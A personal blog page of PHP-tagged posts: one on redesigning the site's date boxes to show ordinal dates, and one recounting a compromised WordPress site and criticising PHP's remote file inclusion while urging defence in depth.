Arrg kxrrt!

Blog : Posts tagged with 'PHP'

*

Design points

In which nothing, design-wise, is accomplished


As I mentioned recently, I’m embarking on a Grand Epic Ground-Upwards Redesign of this site, because, well, the design hasn’t been changed since I first set it up. I knocked it together in a few days holiday in August ’05; back then my holiday year ended in August and I often had a few spare days at the end of the month where I had nothing to do and needed to keep myself occupied. In 2005, this blog was the result.

Anyway, my point is: it was put together in a bit of a hurry, with most of the design code ripped out of a standard theme I downloaded, without me really understanding what each bit did. The design’s always had a few rough edges, and there are lots of things that I’ve meant to develop further but never have. Hopefully, some of those points will be addressed, attacked, and taken by storm.

Thinking about the design, though, and what I want it to achieve, has made me thnik about one of the things I was most unhappy with when I first put this site together. One of the things I liked about this theme when I first saw it was:* the little boxes for the date on each post. You know, these ones:

Date with cardinal number

But one thing I didn’t like, though, was the cardinal number. Maybe it’s because I’m English, that that’s how I was taught, but when I read a date, I always read it with an ordinal number. “January 11th”, not “January 11″.

I can’t remember, to be honest, if it was possible to fix that easily when I first started using WordPress. Possibly it was, possibly it was something that’s been added later.** In any case, I didn’t fix it. I know I tried to, at one point; but abandoned the fix and didn’t go back to it. Then I forgot the issue, until, coming back to the redesign, I tried the fix again the other day. When I retried it, I remembered that I’d given it a go before. Because this is the result

Date with ordinal number

Those two extra characters mean that on most days, the text is just marginally too long to fit in the box. The box gets pushed down. Which isn’t so bad; but, it doesn’t always happen. You can’t necessarily know what the date box will look like; how it will relate to the elements around it. Moreover, I don’t know how it will look on other computers, where the fonts have slightly differing metrics to mine.

There are ways to fix it, of course. The box could be slightly wider. I could make sure that the horizontal line always comes underneath the date box, although that might leave annoying white space under the post title. The question, though, is whether it’s worth doing. However many times I tweak it, I’m not sure I’d ever get it quite right based on the current design.

And so, this all is partly why I’m going to start pretty much from scratch. The risk is that I’ll reinvent the wheel; the upside is that at least I’ll know how it works from its heart.

* and still is

** To be pedantic: it’s not a feature of WordPress itself, it’s a feature of PHP, the underlying language. I’m too lazy to go back through PHP’s version change logs and find out when the feature in question – the “S” character in date formatting strings – was added.

No comments yet. »

Keyword noise: , , , , , , , , ,

*

Defence In Depth

In which we discover we’ve been bad, and have a rant about why


A couple of weeks ago, I discovered that my site had, apparently, been compromised, but my hosting company had handled it. WordPress had been broken in the process; but I’m not entirely surprised. Nevertheless, I thought everything was now happy.

This morning, though, a letter from Google lets me know: it hadn’t been fixed. My site has, for the past fortnight, been serving up crap to any passing search engine. This can’t be good. I don’t blame my hosting company: what they did do was above and beyond the call of duty, and they can’t be expected to understand and trace every twisty little maze of code paths in WordPress that might result on something being sent back to the client’s screen.*** What it does make me want to rant about, though, is PHP.

PHP is – if you’re not a geek and haven’t heard about it – by far the most common “web-programming” language around today. Its modus operandi is: you intersperse chunks of programming code in and around the static content in your web pages. When your webserver reads a page, it will run the chunks of code as a program. In WordPress’s case, the chunks of code run off to a database and fetch my posts, your comments, and so on, from it, and send them back to a client. Thus, one web page can output many posts, managing them is much easier, and so on. All well and good.

PHP, though, is … well. It’s not exactly the best language for the job, which is being polite about it. I’ve been doing lots of programming in it myself lately, for our Office Intranet, and it’s just not as rigorous as other languages. The syntax doesn’t somehow seem as thorough. Apart from the little differences you always get between languages,* it has little corners that feel slightly wrong when I use them, as if I’m transgressing the boundaries between types of programming object in a bad and dirty way.

That’s just a minor thing, really, just me quibbling. What my big problem is, what makes PHP an utterly unsuitable programming language for its job, is one particular feature much adored by people who want to take control of your website and use it to advertise pr0n and drugs. It’s a feature which is unutterably stupid, so stupid I can’t believe anyone thought it should have been created. PHP will, if you like, go and read a file from anywhere on the internet, and run it for you. Which means that a shifty-looking programmer who gets illicit access to the files on your website only has to add a couple of lines of code, to get complete control of everything. Bang. Like that.

Now, you could say: well, FP, you shouldn’t have been using FTP. And you’re right.** My hosts offer SFTP instead, and I should have been using that. There’s no good reason to use FTP either if you have an alternative available. But that doesn’t mean that the next hole along the line shouldn’t be blocked either. It’s called: defence in depth. At work, we have a high fence round the whole site, and an alarm system just inside it; but that doesn’t mean that we leave the office buildings unlocked. Security shouldn’t be brittle; ideally it shouldn’t be thin either. Once you’ve breached the first layer, the tools to complete the job shouldn’t be left lying around.

* The difference between ‘elseif’ – which is a PHP keyword – and ‘elsif’, Perl‘s spelling of the same thing – will forever damage my brain.

** I have a good story about how weak FTP can be – but it can wait for another time.

*** and, indeed, it’s my own fault; I should right away have compared the live files with my known-good backups.

2 comments so far. »

Keyword noise: , , , , ,

*

Search this site

*

Contact

E: feedback [at] symbolicforest [dot] com

IM: Ask me if you'd like to know

*

Post Categories

Artistic (118)
Dear Diary (349)
Feeling Meh (48)
Geekery (109)
In With The Old (34)
Linkery (37)
Media Addict (164)
Meta (79)
Photobloggery (94)
Political (113)
Polling (7)
Sub category (19)
The Family (31)
The Office (70)
Unbelievable (53)